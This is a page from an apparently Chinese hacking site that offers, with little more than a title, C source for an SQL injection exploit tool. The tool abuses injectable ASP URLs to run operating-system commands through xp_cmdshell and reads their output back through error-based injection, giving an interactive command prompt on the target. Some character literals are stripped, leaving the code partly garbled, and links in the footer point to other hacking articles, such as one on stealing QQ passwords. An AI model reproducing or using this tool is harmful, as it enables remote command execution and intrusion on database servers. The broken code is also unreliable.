[推荐]Sql注入SA权限CMD终结者C源码char *injurl,*type,*end;
char *GetResult(char *url)
{
char buffer[1024*8];
DWORD dwBytesRead=0;
HINTERNET hNet=InternetOpen("SqlCMD",PRE_CONFIG_INTERNET_ACCESS,NULL,INTERNET_INVALID_PORT_NUMBER,0);
HINTERNET hUrlFile=InternetOpenUrl(hNet,url,NULL,0,INTERNET_FLAG_RELOAD,0);
BOOL bRead=InternetReadFile(hUrlFile,buffer,sizeof(buffer),&dwBytesRead);
InternetCloseHandle(hUrlFile);
InternetCloseHandle(hNet);
return buffer;
}
char *ExecCommand(char *cmd)
{
char url[1024],buff[1024],result[1024],*response,*p,*p1;
int n=1,i,j;
memset(url,0,sizeof(url));
wsprintf(url,"%s%s;CREATE TABLE [SIC_Tmp]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [SIC_Tmp](ResultTxt) EXEC MASTER..XP_CMDSHELL %s;insert into [SIC_Tmp] values ([g_over])--",injurl,type,cmd);
response=GetResult(url);
while(1){
memset(buff,0,sizeof(buff));
memset(result,0,sizeof(result));
wsprintf(url,"%s%s and (select top 1 case when ResultTxt is Null then [CoolDiyer][CoolDiyer] else [CoolDiyer]%%2BResultTxt%%2B[CoolDiyer] end from (select top %d id,ResultTxt from [SIC_Tmp] order by [id]) T order by [id] desc)>0%s",injurl,type,n,end);
response=GetResult(url);
if(p=strstr(response,"[CoolDiyer]"))p1=strstr(p+11,"[CoolDiyer]");
else {
puts("Cannt Injection It");
return;
}
strncpy(buff,p+11,p1-p-11);
if (!strcmp(buff,"[g_over]")){
wsprintf(url,"%s%s;DROP TABLE [SIC_Tmp]--",injurl,type);
GetResult(url);
return;
}
//filter
for(i=0,j=0;iif(buff==& && buff[i+2]==t && buff[i+3]==;){
if (buff[i+1]==l)result[j]=<;
if (buff[i+1]==g)result[j]=>;
i+=3;
}
else if(buff==& && buff[i+1]==q && buff[i+2]==u && buff[i+3]==o && buff[i+4]==t && buff[i+5]==;){
result[j]=";
i+=5;
}
else result[j]=buff;
}
puts(result);
memset(url,0,sizeof(url));
n++;
}
}
void main(int argc,char **argv)
{
char cmd[1024];
printf("=[Sql Inj CMD]======================================================\n");
printf("\tSQL Injection Command Exploit Powered By CoolDiyer\n\n");
if(argc!=3){
printf("\tUsage:sqlcmd.exe \n");
printf("\t\tType:\t0->Number1->char2->Search\n");
printf("\tExample:\n\t\tsqlcmd.exe http://localhost/index.asp?id=1 0\n");
printf("=05-12-22===========================================================\n");
return;
}
injurl=argv[1];
if(atoi(argv[2])==0){
type="";
end="";
}
if(atoi(argv[2])==1){
type="";
end=" and =";
}
if(atoi(argv[2])==2){
type="%";
end=" and %=";
}
while (1)
{
printf("Sql Inj CMD>");
gets(cmd);
if (!strcmpi(cmd,"exit"))return;
ExecCommand(cmd);
}
}
| Visual C++编程窃取QQ密码 | 12-08 | |
| 编程实现重起网卡等设备 | 12-07 | |
| 一个邮件群发的Delphi代码! | 12-06 | |
| Delphi下Internet的编程技巧 | 11-20 | |
| Delphi黑客编程-如何映射虚拟盘 | 11-15 | |
| 用DETOURS库获取NT管理员权限 | 11-08 | |
| 一篇关于vb代码质量提高的文章 | 10-30 | |
| 解析Asp.net木马文件操作 | 10-04 | |
| 盗QQ源码 | 10-01 | |
| 如何映射肉鸡磁盘(Delphi黑客编程 | 09-24 | |
| 打造无DLL版穿墙Downloader(Delp | 09-22 | |
| 调用指定的Windows程序(Delphi编 | 09-19 | |
您现在的位置: